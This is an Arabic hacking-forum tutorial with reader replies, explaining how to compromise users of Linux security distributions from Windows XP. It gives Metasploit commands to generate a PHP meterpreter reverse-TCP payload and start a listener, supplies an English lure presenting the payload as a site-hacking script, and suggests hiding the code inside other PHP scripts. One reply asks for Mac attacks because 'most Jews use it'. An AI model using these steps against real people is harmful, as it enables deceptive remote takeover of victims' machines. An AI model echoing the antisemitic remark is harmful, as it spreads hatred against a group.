[ دورة التوزيعات الأمنية ] اختراق احدى التوزيعات الأمنية باستخدام [ Windows XP ]

[r00t-minat0r]

بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف الخلق والمرسلين محمد وعلى آله وصحبه اجمعين
اليوم شباب لدينا احد دروس [ دورة التوزيعات الأمنية ] على منتديات جيوش الهكر



درسنا اليوم بعنوان
[ اختراق احدى التوزيعات الأمنية باستخدام Windows XP ]
قد يستغرب البعض هذا العنوان فكما تعودنا نظام XP هو ما يتم اختراقه باستخدام التوزيعات الأمنية
لكن فقط في الجيوش تنقلب الموزايين .

لقد سمعت من بعض الشباب الذي يستخدمون الباك تراك او غيره من التوزيعات الأمنية انه لا يمكن اختراقهم لان هذه التوزيعات هي لنكس ولنكس لا يمكن اختراقه .
ولكن هذا غير صحيح بل يمكن اختراق مستخدمي هذه التوزيعات وهذا ما سنشرحه اليوم
وايظا كون في كل شروحات الاختراق المتقدم يكون الضحية [ المدعوس ] هو نظام [ Windows ] ولكن اليوم سوف نعطي لهذا النظام فرصة للدفاع عن نفسه .



[ الفكرة ]
سوف نقوم بصناعة [ Payload ] بصيغة [ PHP ] ومن ثم استخدام القليل من [ الهندسة الأجتماعية ] لاختراق جهاز الضحية



جيب توفر مشروع [ Metasploit ] على جهاز Windows



نبدا الشرح بعد :
[ بسم الله الرحمن الرحيم ]

اولا نقوم بتشغيل مشروع [ Metasploit ]



ومن ثم ننفذ الاوامر التالي لانشاء [ Payload ] من نوع [ PHP ]

كود:

use payload/php/meterpreter/reverse_tcp
  set LHOST "الايبي بتاعك"
set LPORT "بورت الاتصال العكسي

قم باستبدال البيانات المطلوبة بالأبيانات الصحيحة



الأن نقوم بتنفيذ الامر التالي لانتاج كود [ PHP ] للبيلود

كود:

generate -t raw

سوف تخرج لنا شاشة الـ [ Metasploit ] الكود
قم بنسخ الكود ابتداءا من كلمة :

#<?php

وانتهاءا بكلمة :

die();

انسخ الكود بشكل كامل وضعه في ملف نصي جديد



قم بحفظ الملف بأي اسم تريده بصيغة [ PHP ]
مثال :

payload.php

الان نقوم بتشغيل التنصت على الأتصال الخارجي في الميتاسبلوت
وذلك عن طريق تنفيذ الاوامر التالية :

كود:

use multi/handler
set lport "بورت الأتصال العكسي"
set lhost "الأيبي بتاعك"
set payload php/meterpreter/reverse_tcp

ومن ثم نبدا التنصت باستخدام الأمر

كود:

exploit

نقوم الان باستخدام الـ [ الهندسة الأجتماعية ] لارسال الـ [ Payload ] الى الضحية وجلعه يشغله .
طبعا هنا عليك الأبداع فمثلا بما ان الـ [ Payload ] من نوع [ PHP ] حاول خداع الضحية بأخباره ان هذا الملف هو سكربت لأختراق المواقع .
مثال :

This PHP script will Allow you to to upload a file to any site that using linux server
just start the file using the command
php file.php
or
put it in your PHP server and start it

وانت حاول ان تخترع طرق من عندك لايهام الضحية بان هذا الملف سوف يساعده في اختراق موقع ما او جهاز ما .

والان على جهة الضحية وفي هذه الحالة سوف تكون احدى التوزيعات الأمنية
وفي الشرح استخدم توزيعه [ BlackBuntu ]




سوف يقوم الضحية بتشغيل الملف بطريقتين

الأول : ( باستخدام سطر الاوامر )
تنفيذ الامر التالي :

كود:

php filename.php

الثانية : ( باستخدام سيرفر )
سوف يقوم بوضع الملف في سيرفر المواقع المرفق في التوزيعه مثل :
Apache
وتشغيل الملف من المتصفح

في كلتا الحالتين سوف يتم الأختراق

تشغيل الملف :



باستخدام سطر الاوامر :

كود:

php filename.php

كما ترون لم يظهر للضحية اي شيء في سطر الأوامر بعد تشغيل الملف
يمكنك حقن كود الملف في اي سكربت [ PHP ] لابعاد الشك

الان نذهب الى جهاز الهكر وفي هذه الحالة هو نظام [ Windows XP ]
لنرى النتيجة وهي :



Game Over

كما ترون تم فتح الجلسة بنجاح والان انت تمتلك السيطرة على جهاز الضحية

no one is safe



اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته

[Ace]

حلو روت درس حلو بمناسبة رجوع الموقع تقيم خمسه ستار ههههههههه

[Mad Devil]

هههههههه ويقولو ان اللينكس ميخترق والله على كلامك لا يوجد احد بي امأن

مشكورررر

[Omar Hack]

جزاك الله كل خير أخي الكريم

" يجب أن تضع للبعض سمعات قبل إعطائها إلى r00t-minat0r مرة أخرى. "

وشكراً جزيلاً لك

[ابودهال]

مشكوووور يابطل جيوش الهكر فعلن انت ملك الهكر الله يعطيك الف عااافيه
بس ياليت تشرح كيف اختراق نظام ماك لان اكثر اليهود يستخدمونه

[قاتل الهكر]

مشكور على الموضوع اخوي

[سارة الغامدي]

يسلمؤؤؤ ..

[sarahassan]

والله تستاهل ألف ألف تحية خيو